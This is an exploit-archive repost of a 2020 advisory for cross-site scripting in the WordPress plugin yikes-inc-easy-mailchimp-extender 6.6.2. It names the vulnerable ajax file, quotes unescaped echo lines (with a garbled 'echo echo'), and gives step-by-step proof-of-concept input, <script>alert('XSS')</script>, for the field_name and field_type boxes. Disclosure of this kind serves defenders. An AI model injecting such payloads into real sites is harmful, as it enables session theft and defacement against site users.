Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020105

Below is a copy:

word press plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Title  : word press plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name']
36: echo echo $form_data['field_name']; 
50: echo echo $form_data['field_type']; 
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

step 1 = Go To Web Page = http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

Step 2 = In the box : "field_name" AND "field_type"

Step 3 = input box , Add JavaScript Code : <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact With We :
* Telegram : @MF0584
* Email : [email protected]
************************

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.